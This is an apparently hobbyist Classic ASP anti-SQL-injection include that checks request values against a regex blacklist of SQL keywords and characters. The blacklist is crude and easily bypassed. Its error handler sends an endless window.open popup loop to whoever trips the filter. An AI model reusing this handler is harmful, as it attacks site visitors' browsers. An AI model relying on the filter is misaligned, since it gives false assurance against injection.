<%
' Copyright by Samy http://www.2cto.com
Call SafeRequest

' Screen every query-string, form and cookie value of the current request.
' Each collection is checked independently of the others.
Sub SafeRequest
    If Request.QueryString <> "" Then Call Kll_Inje(Request.QueryString)
    If Request.Form <> "" Then Call Kll_Inje(Request.Form)
    If Request.Cookies <> "" Then Call Kll_Inje(Request.Cookies)
End Sub

' Check for SQL injection: reject the request if any value in the
' collection matches the keyword/character blacklist.
Function Kll_Inje(Values)
    Dim X, Kyd, In_Data
    Kyd = "(\sand\s|\sunion\s|\sor\s\b|\binsert\b|\bdelete\b|\bupdate|\bdrop|\bdeclare\b|\bcreate\b|\b\'|\;|\*|\@|\(|\)|\<|\>|\!|\-|\.\/|\_|\.\\)"
    Set X = New RegExp
    X.IgnoreCase = True
    X.Global = True
    X.Pattern = Kyd
    For Each In_Data In Values
        If X.Test(Values(In_Data)) Then
            Call Error
        End If
    Next
    Set X = Nothing
End Function

' Check integer: returns the value as a Long, or 0 if it is out of range.
' Non-numeric input ends the request.
Function Kl_int(val)
    If Not IsNumeric(val) Then
        Kl_int = 0
        Call Error
    ElseIf CDbl(val) < 0 Or CDbl(val) > 2147483647 Then
        Kl_int = 0
    Else
        Kl_int = CLng(val)
    End If
End Function

' Check string: returns the value unchanged when it contains no single quote.
' Input containing a single quote ends the request.
Function kl_Str(val)
    If Len(val) = 0 Then
        kl_Str = ""
    ElseIf InStr(val, "'") > 0 Then
        kl_Str = Trim(Replace(val, "'", ""))
        Call Error
    Else
        kl_Str = val
    End If
End Function

' Response sent when a check fails; the request stops here.
Sub Error
    Response.Write "<script>while(1){window.open('http://www.fbi.gov');}</script>"
    'Response.Redirect "/"
    Response.End
End Sub
%>

Author: Samy
Source: http://hi.baidu.com/0x7362/blog